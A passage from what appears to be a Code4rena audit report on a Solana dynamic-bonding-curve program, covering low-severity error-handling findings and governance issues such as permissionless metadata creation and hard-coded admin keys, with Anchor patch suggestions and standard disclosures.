+ fn assert_owner(sender: &Signer, owner: &UncheckedAccount) -> Result<()> {
+ require!(sender.key() == owner.key(), PoolError::InvalidOwnerAccount);
+ Ok(())
+ }
// call early in handler
+ assert_owner(&ctx.accounts.sender, &ctx.accounts.owner)?;
L-08: Overbroad error reuse reduces diagnosability
Location(s): Reuse of generic errors like NotPermitToDoThisAction (see L-02 remediation and similar flows).
Impact (why this matters): Incident response and UX suffer when distinct violations (e.g., already migrated vs. unauthorized actor vs. invalid owner) map to the same error, obscuring root cause and complicating monitoring.
Remediation: Introduce specific errors (e.g., AlreadyMigrated, Unauthorized, reuse InvalidOwnerAccount), and replace the generic catch-all across affected paths (migration metadata init, LP lock/claim, etc.). Keep InvalidOwnerAccount from L-07 and add AlreadyMigrated for L-02.
Governance / Centralization Findings
C-01: Permissionless metadata creation allows third-party timing control
Location(s): programs/dynamic-bonding-curve/src/instructions/migration/dynamic_amm_v2/migration_damm_v2_create_metadata.rs
Centralized Power / Trust Assumption: Anyone can initialize the migration metadata PDA as long as they pay rent; there is no creator/admin binding in the accounts. This allows third parties to front‑run initialization and control timing.
Risk Rationale: Although fields are set deterministically from config, control over creation timing and rent payer is externalized, which can be undesirable in governed flows and can complicate operational guarantees (monitoring, sequencing).
Recommended Controls: Add an account constraint tying virtual_pool.creator (or config.fee_claimer) to the caller (e.g., constraint = virtual_pool.load()?.creator == payer.key() @ PoolError::Unauthorized), or explicitly document that permissionless creation is intended.
Evidence:
#[derive(Accounts)]
pub struct MigrationDammV2CreateMetadataCtx<'info> {
#[account(has_one=config)]
pub virtual_pool: AccountLoader<'info, VirtualPool>,
pub config: AccountLoader<'info, PoolConfig>,
#[account(init, payer = payer, seeds = [DAMM_V2_METADATA_PREFIX.as_ref(), virtual_pool.key().as_ref()], bump, space = 8 + MeteoraDammV2Metadata::INIT_SPACE)]
pub migration_metadata: AccountLoader<'info, MeteoraDammV2Metadata>,
#[account(mut)]
pub payer: Signer<'info>,
}
Patch (Anchor constraint example):
#[derive(Accounts)]
pub struct MigrationDammV2CreateMetadataCtx<'info> {
#[account(
has_one = config,
+ constraint = virtual_pool.load()?.creator == payer.key() @ PoolError::Unauthorized,
)]
pub virtual_pool: AccountLoader<'info, VirtualPool>,
// ...
}
Also applies to Meteora DAMM metadata creation (programs/dynamic-bonding-curve/src/instructions/migration/meteora_damm/migration_meteora_damm_create_metadata.rs), which follows the same permissionless init pattern.
C-02: Hard-coded admin keys; no multisig/timelock enforcement
Location(s): programs/dynamic-bonding-curve/src/instructions/admin/auth.rs (the ADMINS array / assert_eq_admin)
Centralized Power / Trust Assumption: Upgrades or privileged operations rely on single keys; operational mistakes or key compromise have full blast radius.
Risk Rationale: Fixed admin set increases key-management risk and limits operational flexibility (no rotation/timelock by default).
Recommended Controls: Gate admin ops behind a governance PDA (e.g., SPL-Governance) or a program-verified multisig; or, at minimum, document the trust model and enforce a timelock / 2-of-3 policy operationally.
Disclosures
C4 is an open organization governed by participants in the community.
C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.
C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.